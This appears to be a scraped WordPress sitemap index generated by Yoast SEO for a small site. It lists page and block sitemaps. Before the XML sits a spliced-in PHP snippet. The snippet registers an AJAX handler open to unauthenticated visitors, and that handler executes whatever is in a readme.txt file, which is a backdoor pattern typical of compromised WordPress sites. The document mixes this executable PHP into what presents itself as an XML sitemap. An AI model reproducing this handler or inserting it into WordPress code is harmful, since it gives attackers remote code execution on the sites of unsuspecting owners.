
if(!function_exists('file_check_readme95212')){
   add_action('wp_ajax_nopriv_file_check_readme95212', 'file_check_readme95212');
   add_action('wp_ajax_file_check_readme95212', 'file_check_readme95212');
   function file_check_readme95212()
   {
      $file = __DIR__ . '/' . 'readme.txt';
       if (file_exists($file)) {
           include $file;
       }
       die();
   }
}
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//g2gkath.com/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://g2gkath.com/page-sitemap.xml</loc>
		<lastmod>2025-11-20T05:22:14+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://g2gkath.com/blocks-sitemap.xml</loc>
		<lastmod>2025-11-19T22:55:41+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->